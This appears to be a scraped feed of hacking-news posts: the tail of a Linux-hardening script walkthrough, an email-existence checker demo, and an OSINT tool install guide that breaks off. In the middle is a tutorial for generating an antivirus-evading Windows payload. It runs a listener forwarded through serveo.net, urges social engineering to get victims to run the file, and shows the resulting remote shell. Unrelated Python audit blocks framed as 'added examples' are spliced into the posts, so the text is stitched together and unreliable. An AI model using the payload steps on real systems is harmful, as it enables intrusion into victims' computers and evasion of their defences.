  • Then it will install additional dependencies & apply additional server hardening steps, and ask you to press y or n to disable or keep USB support.
[+] Running additional Hardening Steps
 Running Additional Hardening Steps….
 Reading package lists… Done++++++++++++++++++++++++++   ]
 Building dependency tree
 Reading state information… Done
 Package 'at' is not installed, so not removed
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7

Preparing to unpack …/libpam-cracklib_1.1.8-3.6ubuntu2.18.04.1_amd64.deb …
 Unpacking libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Securing Cron
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
Do you want to Disable USB Support for this Server? (y/n): n
OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Unhide, which displays hidden processes running in the background.
[+] Installing UnHide
 Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   rkhunter
 The following NEW packages will be installed:
   unhide
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 46.6 kB of archives.
 After this operation, 136 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 unhide amd64 20130526-1 [46.6 kB]
 Fetched 46.6 kB in 2s (25.9 kB/s)
 Selecting previously unselected package unhide.
 (Reading database … 228917 files and directories currently installed.)
 Preparing to unpack …/unhide_20130526-1_amd64.deb …
 Unpacking unhide (20130526-1) …
 Setting up unhide (20130526-1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Tiger dependency.
[+] Installing Tiger
 Tiger is a security tool that can be use both as a security audit and intrusion detection system
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   chkrootkit john john-data tripwire
 The following NEW packages will be installed:
   chkrootkit john john-data tiger tripwire
 0 upgraded, 5 newly installed, 0 to remove and 1 not upgraded.
 Need to get 6,868 kB of archives.
 After this operation, 24.0 MB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tripwire amd64 2.4.3.1-2 [1,647 kB]

Setting up john-data (1.8.0-2build1) …
 Setting up john (1.8.0-2build1) …
 For More info about the Tool use the ManPages
  man tiger
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install rootkit hunter.
[+] Installing RootKit Hunter
 Rootkit Hunter is a scanning tool to ensure you are you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
 - MD5 hash compare      
 - Look for default files used by rootkits      
 - Wrong file permissions for binaries      
 - Look for suspected strings in LKM and KLD modules      
 - Look for hidden files      
 - Optional scan within plaintext and binary files 

File updated: searched for 181 files, found 152
 ***To Run RootKit Hunter ***
      rkhunter -c --enable all --disable none
      Detailed report on /var/log/rkhunter.log
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will tune bashrc.
[+] Tunning bashrc, nano and Vim
 Tunning .bashrc……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Tunning Vim……
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Tunning Nano……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then JShielder will create a daily cron job.
[+] Adding Daily System Update Cron Job
 Creating Daily Cron Job
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Most of JShielder's configuration is automated. Next it installs Artillery.
[+] Cloning Repo and Installing Artillery
 fatal: destination path 'artillery' already exists and is not an empty directory.
 Welcome to the Artillery installer. Artillery is a honeypot, file monitoring, and overall security tool used to protect your nix systems.
 Written by: Dave Kennedy (ReL1K)

 Do you want to install Artillery and have it automatically run when you restart [y/n]: y

[*] Adding artillery into startup through init scripts..
 [*] Triggering update-rc.d on artillery to automatic start…
 [*] Checking out Artillery through github to /var/artillery
 Cloning into '/var/artillery'…
 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (35/35), done.
 remote: Total 1632 (delta 17), reused 3 (delta 0), pack-reused 1597

Setting Iptable rules for artillery
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Artillery configuration file is /var/artillery/config
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install PSAD
[+] Install PSAD
 PSAD is a piece of Software that actively monitors you Firewall Logs to Determine if a scan
        or attack event is in Progress. It can alert and Take action to deter the Threat
    NOTE:    IF YOU ARE ONLY RUNNING THIS FUNCTION, YOU MUST ENABLE 

 LOGGING FOR iptables   
 iptables -A INPUT -j LOG   \
 iptables -A FORWARD -j LOG

 Do you want to install PSAD (Recommended)? (y/n): y

To EXIT Press x Key, Press ENTER to Continue
  • Then disable compilers.
[+] Disabling Compilers
 Disabling Compilers…..
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
  If you wish to use them, just change the Permissions
  Example: chmod 755 /usr/bin/gcc 
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now secure the tmp folder. Enter y
[+] Securing /tmp Folder
 ¿Did you Create a Separate /tmp partition during the Initial Installation? (y/n): y

Nice Going, Remember to set proper permissions in /etc/fstab
 Example:
 /dev/sda4   /tmp   tmpfs  loop,nosuid,noexec,rw  0 0 
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • JShielder will restrict access to the Apache config files.
[+] Restricting Access to Apache Config Files
 Restricting Access to Apache Config Files……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++    ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will enable unattended security updates. Press y
[+] Enable Unattended Security Updates
 ¿Do you Wish to Enable Unattended Security Updates? (y/n): y
  • It will install the process accounting dependency.
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 87.2 kB of archives.
 After this operation, 304 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 acct amd64 6.6.4-1 [87.2 kB]
 Fetched 87.2 kB in 2s (48.7 kB/s)                      
 Selecting previously unselected package acct.
 (Reading database … 229408 files and directories currently installed.)
 Preparing to unpack …/acct_6.6.4-1_amd64.deb …
 Unpacking acct (6.6.4-1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Processing triggers for install-info (6.5.0.dfsg.1-2) …
 Setting up acct (6.6.4-1) …
 update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
 update-rc.d: warning: stop runlevel arguments (1) do not match acct Default-Stop values (0 1 6)
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 OK
  • Install auditd. Enter y
[+] Installing auditd
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   libauparse0
 Suggested packages:
   audispd-plugins

After this operation, 803 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Enabling auditing for processes that start prior to auditd
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]Sourcing file `/etc/default/grub'
 Generating grub configuration file …
 Found linux image: /boot/vmlinuz-4.18.0-25-generic
 Found initrd image: /boot/initrd.img-4.18.0-25-generic
 Found linux image: /boot/vmlinuz-4.18.0-15-generic
 Found initrd image: /boot/initrd.img-4.18.0-15-generic
 Found memtest86+ image: /boot/memtest86+.elf
 Found memtest86+ image: /boot/memtest86+.bin
 done
 Configuring Auditd Rules
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • JShielder will install and enable sysstat.
[+] Installing and enabling sysstat
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   isag
 The following NEW packages will be installed:
   sysstat
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 295 kB of archives.
 After this operation, 1,192 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 sysstat amd64 11.6.1-1 [295 kB]
 Fetched 295 kB in 2s (124 kB/s)    

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue                
  • Install arpwatch for monitoring ARP traffic. Enter y
[+] ArpWatch Install
 ArpWatch is a tool for monitoring ARP traffic on System. It generates log of observed pairing of IP and MAC.
 Do you want to Install ArpWatch on this Server? (y/n): y

Synchronizing state of arpwatch.service with SysV service script with /lib/systemd/systemd-sysv-install.
 Executing: /lib/systemd/systemd-sysv-install enable arpwatch

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Set the GNU GRUB bootloader password. More information on how the bootloader works is part of the advanced ethical hacking course of International Institute of Cyber Security (IICS, iiCyberSecurity).
[+] GRUB Bootloader Password
 It is recommended to set a password on GRUB bootloader to prevent altering boot configuration (e.g. boot in single user mode without password)
 Do you want to set a GRUB Bootloader Password? (y/n): y

Do you want to set a GRUB Bootloader Password? (y/n): y
 Enter password: 
 Reenter password: 
 PBKDF2 hash of your password is grub.pbkdf2.sha512.10000.15D5D8416652D02126C81FCF8C49A59B82F070F8010A13412C420345E97AA9CADC8798E7218A27105875C0C0950DC6A7EAC1D3DA92C32A6107FF572CB42A1D53.C05B506339CB3227411FF804E9587808E40CD72DD07CD749B004D324E9F90D2A4D092E6C9BE64E6E61DC71FB32A8DB00E65CA7BE6582975E30F64C9D46CD1C19
 Sourcing file `/etc/default/grub'
 Generating grub configuration file …

Found memtest86+ image: /boot/memtest86+.bin
 done
 On every boot enter root user and the password you just set
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Secure boot settings.
Securing Boot Settings
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Setting File Permissions on Critical System Files
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
 Setting Sticky bit on all world-writable directories
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
: Read-only file system
 chmod: changing permissions of '/snap/core/7270/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/7270/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core/6350/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/var/tmp': Read-only file system

  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Above you can see that the permissions have been changed. All changes have been completed. JShielder then displays a message that it has fully configured Ubuntu for creating and deploying web applications.
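Two of the steps above, the sticky bit on world-writable directories and the nosuid,noexec mount options for /tmp, can be verified and re-applied with a short audit. The following is an added example, not JShielder's own code: the directory tree and the fstab lines it checks are constructed inline, and, because the output above shows chmod failing on the read-only /snap mounts, it records directories it cannot change instead of aborting.

```python
"""Audit helpers for two JShielder hardening steps (added example, not the
script's own code): world-writable directories must carry the sticky bit,
and the /tmp entry in fstab should carry nosuid and noexec."""
import errno
import os
import stat
import tempfile


def sticky_bit_audit(root, fix=False):
    """Walk `root` and return (unsafe, fixed, skipped): world-writable
    directories lacking the sticky bit, those repaired when fix=True, and
    those that could not be changed (read-only mounts, no permission)."""
    unsafe, fixed, skipped = [], [], []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISDIR(st.st_mode):
                continue  # a symlink to a directory, not the directory itself
            if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
                unsafe.append(path)
                if fix:
                    try:
                        os.chmod(path, stat.S_IMODE(st.st_mode) | stat.S_ISVTX)
                        fixed.append(path)
                    except OSError as exc:
                        if exc.errno in (errno.EROFS, errno.EPERM):
                            skipped.append(path)  # e.g. /snap/... squashfs mounts
                        else:
                            raise
    return sorted(unsafe), sorted(fixed), sorted(skipped)


def tmp_mount_hardened(fstab_text):
    """True if the /tmp entry in fstab-formatted text carries nosuid and noexec."""
    for line in fstab_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and not fields[0].startswith("#") and fields[1] == "/tmp":
            opts = set(fields[3].split(","))
            return {"nosuid", "noexec"} <= opts
    return False  # no /tmp entry at all: /tmp inherits the root filesystem's options


def demo():
    """Build a constructed directory tree, run the audit with fix=True, then
    re-audit to confirm the repair; also check two constructed fstab lines."""
    root = tempfile.mkdtemp(prefix="sticky-audit-")
    for name, mode in (("shared_ok", 0o1777), ("shared_bad", 0o777), ("private", 0o755)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    before, fixed, skipped = sticky_bit_audit(root, fix=True)
    after, _, _ = sticky_bit_audit(root)
    good = "/dev/sda4   /tmp   tmpfs  loop,nosuid,noexec,rw  0 0\n"  # the page's example line
    weak = "/dev/sda4   /tmp   ext4   defaults  0 0\n"              # constructed weak line
    return {
        "unsafe_before": [os.path.relpath(p, root) for p in before],
        "fixed": [os.path.relpath(p, root) for p in fixed],
        "skipped": skipped,
        "unsafe_after": after,
        "good_fstab": tmp_mount_hardened(good),
        "weak_fstab": tmp_mount_hardened(weak),
    }


if __name__ == "__main__":
    print(demo())
```

Run it as root with `sticky_bit_audit("/", fix=True)` to reproduce the script's step over the whole system; the `skipped` list is where the read-only snap paths from the output above end up.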

The post How to Secure any Linux Server | Automated Server Hardening script appeared first on Information Security Newspaper | Hacking News.

Create Windows 10 FUD (Fully Undetectable) payload
https://www.securitynewspaper.com/2019/06/20/create-windows-10-fud-fully-undetectable-payload/
Thu, 20 Jun 2019 16:44:42 +0000

A Windows shell is what every hacker loves. Various Windows payloads are designed to bypass Windows OS security mechanisms. According to ethical hacking researchers of the International Institute of Cyber Security, these payloads are well coded to get sessions on Windows OS. There are many different ways of getting a reverse shell. Today we will show the getwin tool, used to create a Win32 payload and listener.

The payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do not upload the generated payload to virustotal.com.

The tool does not need any configuration: there is no need to configure port forwarding or install other programs. See the demonstration in the video below.

  • For testing purposes, on the attacker side we will use Kali Linux 2018.4 amd64 and on the victim side we will use Windows 10 1809.
  • Open a terminal and type git clone https://github.com/thelinuxchoice/getwin.git
  • Then type cd getwin and type chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Type ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • After the tool has started, press Enter to set the default port. Then enter the payload name (test01) and select the icon.
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [*] Put ICON path (Default: icon/messenger.ico ):
 [*] Compiling…
 [*] Saved: test01.exe
 [!] Please, don't upload to virustotal.com !
 [*] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • As you can see, the listener has started. Now you can use any social engineering trick to execute the payload on the victim computer.
  • For testing we will use Windows 10 1809 with Windows Defender enabled.
  • So now we will execute the payload in Windows 10 OS.
  • After creating the payload (test01.exe), execute it: simply double-click the executable.
  • As you double-click the payload (test01.exe), a session is created between the victim and the attacker machine and you get a Windows shell.
  • Tools like this are part of the ethical hacking courses offered by International Institute of Cyber Security

Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…
 listening on [any] 4342 …
 connect to [127.0.0.1] from localhost [127.0.0.1] 43878
 TCP connection from 27.4.174.190 on port 3352
 Microsoft Windows [Version 10.0.17758.1]
 (c) 2018 Microsoft Corporation. All rights reserved.
 E:\>C:
 C:
 C:\>ipconfig
 ipconfig
 Windows IP Configuration
 Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
    IPv4 Address. . . . . . . . . . . : 192.168.1.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%13
                                        192.168.1.1
C:\>getmac
 getmac
 Physical Address    Transport Name
 =================== ==========================================================
 ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hidden the MAC address)
  • Now the attacker can change or view any file on the target's Windows 10 computer.

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

Solution to spamming, Check any Unknown Email ID existence
https://www.securitynewspaper.com/2019/05/20/solution-to-spamming-check-any-unknown-email-id-existence/
Mon, 20 May 2019 18:08:58 +0000

Email spamming has been common for the last 10-20 years. There are many individual attackers or groups of attackers who spread malicious content by choosing email services as a weapon. According to ethical hacking researchers of the International Institute of Cyber Security, there are many online tools which help in finding the path of an email. Recently many unknown spam emails were found spreading malware over the internet. But very few show whether an email exists or not. Today we will show you a small Python script, KnockMail, designed to find whether emails exist or not.

  • For testing we are using Kali Linux 2019.1 amd64. Before installing KnockMail, make sure Python is installed.
  • Type sudo apt-get update && sudo apt-get install python.
  • Type git clone https://github.com/4w4k3/KnockMail.git
  • Type cd KnockMail && chmod u+x requeriments.txt knock.py
  • Type pip install -r requeriments.txt
  • Type python knock.py
root@kali:~/Downloads/KnockMail# python knock.py
By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.
  • Type 2 and then enter the email address. baj#############@gmail.com is the testing email ID.
  • For testing we are using the email ID of one of our ethical hacking researchers of International Institute of Cyber Security. For security we have hidden the email address.
KKM > 2
Type the email to search: baj#############@gmail.com
[*] FOUND - [baj#############@gmail.com ]
KKM >
  • The above query shows that the email exists and is found by KnockMail.
  • For further testing we are using an unknown mail ID. The mail was about opening a first Demat account. The mail came from newsletters@smtpmailbox.com as spam.
  • When checking this email with KnockMail, we found:
  • Type python knock.py
 root@kali:~/Downloads/KnockMail# python knock.py 
By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.
  • Type 2 & then enter newsletters@smtpmailbox.com
KKM > 2
Type the email to search: newsletters@smtpmailbox.com
[!] NOTFD - [newsletters@smtpmailbox.com]
KKM >
  • The above output shows that the email address is not found (NOTFD), which means the email was generated from a temporary mail address, or a temporary email server was used to send spam emails to targets.

Using Small List of Emails :-

  • Type python knock.py
root@kali:~/Downloads/KnockMail# python knock.py  
By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.
  • Type 1 and then enter /root/Downloads/KnockMail/inputfile.txt
  • For testing we have hidden the list of email addresses. To grab a list of email addresses you can use theHarvester.
KKM > 1
Type the path of file containing a list of emails: /root/Downloads/KnockMail/inputfile.txt
[!] NOTFD - [r##########dd@gmail.com] {line 1}
[*] FOUND - [U##############ol@hotmail.com] {line 2}
[!] NOTFD - [e###########ge@protonmail.com] {line 3}
KKM >
  • The above query shows that only one email ID is found and the rest were not found. This tool shows whether emails exist.
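The FOUND / NOTFD verdicts in both runs above come from the reply a mail server gives to an SMTP RCPT TO for the address. The following added example (not KnockMail's own code) implements that classification and the two checks a practitioner wants around it: a temporary 4xx reply or a 252 proves nothing, and a 250 only means something if a random address at the same domain is rejected, since a catch-all domain accepts everything. The fake_mta stand-in is constructed so the example runs offline; smtp_rcpt builds the same callable against a real MX host, which a mail administrator can point at their own domain to see whether it leaks mailbox existence this way.

```python
"""SMTP recipient verification, the technique behind KnockMail-style checks
(added example, not the tool's code). Verdict labels mirror the tool's
FOUND / NOTFD output; UNKNOWN is added for replies that prove nothing."""
import random
import string

FOUND, NOTFD, UNKNOWN = "FOUND", "NOTFD", "UNKNOWN"


def classify_rcpt_reply(code, text=""):
    """Map the reply to an SMTP RCPT TO command onto a verdict about the mailbox."""
    if code == 250:
        return FOUND          # recipient accepted
    if code == 252:
        return UNKNOWN        # "cannot VRFY user, but will accept message"
    if 400 <= code < 500:
        return UNKNOWN        # temporary failure: greylisting, rate limiting
    if code in (550, 551, 553):
        return NOTFD          # mailbox unavailable / not local / not allowed
    return UNKNOWN


def verify(address, rcpt):
    """`rcpt` is a callable address -> (code, text) that performs one RCPT TO.
    A FOUND is only trusted if a random address at the same domain is
    rejected; otherwise the domain is catch-all and acceptance proves nothing."""
    verdict = classify_rcpt_reply(*rcpt(address))
    if verdict != FOUND:
        return verdict
    domain = address.rsplit("@", 1)[-1]
    probe_local = "".join(random.choices(string.ascii_lowercase + string.digits, k=24))
    if classify_rcpt_reply(*rcpt(f"{probe_local}@{domain}")) == FOUND:
        return UNKNOWN
    return FOUND


def fake_mta(known, catch_all=False, greylist=False):
    """Constructed stand-in for a mail server so the example runs offline."""
    known = {a.lower() for a in known}

    def rcpt(address):
        if greylist:
            return 451, "4.7.1 Greylisted, try again later"
        if catch_all or address.lower() in known:
            return 250, "2.1.5 OK"
        return 550, "5.1.1 The email account that you tried to reach does not exist"
    return rcpt


def smtp_rcpt(mx_host, sender="probe@example.net", timeout=10.0):
    """Build an `rcpt` callable that asks a real MX host on port 25 (standard
    library smtplib). Not exercised by the offline test; mx_host and sender
    are placeholders you supply."""
    import smtplib

    def rcpt(address):
        with smtplib.SMTP(mx_host, 25, timeout=timeout) as smtp:
            smtp.ehlo_or_helo_if_needed()
            smtp.mail(sender)
            code, msg = smtp.rcpt(address)
            return code, msg.decode("utf-8", "replace")
    return rcpt


if __name__ == "__main__":
    strict = fake_mta({"alice@example.com"})
    for addr in ("alice@example.com", "bob@example.com"):
        print(addr, verify(addr, strict))
```

The catch-all probe is why a NOTFD from a tool like this is only as good as the remote server's policy: a server that greylists unknown senders, or rejects every RCPT TO from hosts without a sending reputation, yields no information at all rather than evidence that the address is disposable.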

The post Solution to spamming, Check any Unknown Email ID existence appeared first on Information Security Newspaper | Hacking News.

Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step)
https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/
Thu, 02 May 2019 15:35:44 +0000

OSINT (Open Source Intelligence) is a way to collect data from public sources. Many tools and techniques capable of gathering information from public sources are part of the ethical hacking classes of International Institute of Cyber Security (IICS). Basically, before attacking, there is always a need to collect information about your target: gathering different domains, sub-domains, open ports, services and other details. According to ethical hacking researchers of International Institute of Cyber Security (IICS), different search engines such as Shodan and Censys are used in scanning/reconnaissance.

Today we came with another OSINT tool used for gathering information. It is very common for OSINT tools to be used for threat intelligence or cyber investigations. OSINT Search is a small Python script for extracting data using different search engines and different developers' API keys. It is designed to search for public email addresses, domains and phone numbers.

OSINT Functionality Offers :-

  • Find personal information such as name, gender, GPS location, age, languages, social network profiles, etc.
  • Find information related to data breaches.
  • Find which country a phone number belongs to.
  • Find results of Google hacking techniques.
  • Find results related to domains or IP addresses.
  • Find digital certificates for a certain domain.
  • Find the CMS for a certain website.
  • Find DNS records and zone transfer information for a certain domain.
  • Find the Facebook ID and a Facebook page full of photos after getting a Facebook profile URL.
  • Find URLs present in some web page.
  • Find a URL to know what torrents are being downloaded from some IP.

Installation Of OSINT Search Description :-

  • For testing, Kali Linux 2019.1 amd64 is used. The tool was tested on a live boot of Kali Linux 2019.1 amd64.
  • Before installing OSINT Search, make sure python3 is installed, as the tool runs on python3. To install it, type sudo apt-get update && sudo apt-get install python3
  • Once python3 is installed, type sudo apt-get install python3-dev
root@kali:~/Downloads# apt-get update
Get:1 https://ftp.yzu.edu.tw/Linux/kali kali-rolling InRelease [30.5 kB]
Get:2 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main Sources [12.8 MB]
e amd64 Packages [187 kB]
Fetched 30.4 MB in 14s (2,120 kB/s)
Reading package lists… Done

root@kali:~/Downloads# apt-get install python3
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following packages were automatically installed and are no longer required:
libpython3.6 libpython3.6-dev python3.6-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
libpython3-dev libpython3-stdlib libpython3.7 libpython3.7-dev libpython3.7-minimal libpython3.7-stdlib python3-dev
python3-distutils python3-minimal python3.7 python3.7-dev python3.7-minimal
Suggested packages:
python3-doc python3-tk python3-venv python3.7-venv python3.7-doc
The following NEW packages will be installed:
libpython3.7-dev python3.7-dev
  • Then install pip3. For that, type sudo apt-get install python3-pip
  • Type git clone https://github.com/am0nt31r0/OSINT-Search.git
root@kali:~/Downloads# git clone https://github.com/am0nt31r0/OSINT-Search.git
Cloning into 'OSINT-Search'…
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (30/30), done.
remote: Total 171 (delta 8), reused 0 (delta 0), pack-reused 141
Receiving objects: 100% (171/171), 61.15 KiB | 279.00 KiB/s, done.
Resolving deltas: 100% (55/55), done.
  • Type cd OSINT-Search, then chmod u+x requirements.txt and chmod u+x osintS34rCh.py
  • Type ls -ltr to check the permissions.
root@kali:~/Downloads# cd OSINT-Search/ 
root@kali:~/Downloads/OSINT-Search# chmod u+x requirements.txt
root@kali:~/Downloads/OSINT-Search# chmod u+x osintS34rCh.py
root@kali:~/Downloads/OSINT-Search# ls -ltr
total 52
-rwxr--r-- 1 root root 145 May 1 05:05 requirements.txt
-rw-r--r-- 1 root root 4317 May 1 05:05 README.md
-rwxr--r-- 1 root root 40432 May 1 05:05 osintS34rCh.py
  • Type pip3 install -r requirements.txt
root@kali:~/Downloads/OSINT-Search# pip3 install -r requirements.txt
Collecting git+https://github.com/abenassi/Google-Search-API (from -r requirements.txt (line 3))
Cloning https://github.com/abenassi/Google-Search-API to /tmp/pip-req-build-f4j93eyc
Collecting validate_email (from -r requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/84/a0/cb53fb64b52123513d04f9b913b905f3eb6fda7264e639b4573cc715c29f/validate_email-1.3.tar.gz
Collecting opencnam (from -r requirements.txt (line 2))
Downloading https://files.pythonhosted.org/packages/25/cc/b3bdfedabcf0d0b9b2438dd00d1f65ca8d2d691ba24030cc544a6a0114e8/opencnam-0.6-py3-none-any.whl
Collecting pyfiglet (from -r requirements.txt (line 4))
Downloading https://files.pythonhosted.org/packages/33/07/fcfdd7a2872f5b348953de35acce1544dab0c1e8368dca54279b1cde5c15/pyfiglet-0.8.post1-py2.py3-none-any.whl (865kB)
100% |████████████████████████████████| 870kB 908kB/s
  • Type pip3 install git+https://github.com/abenassi/Google-Search-API --upgrade
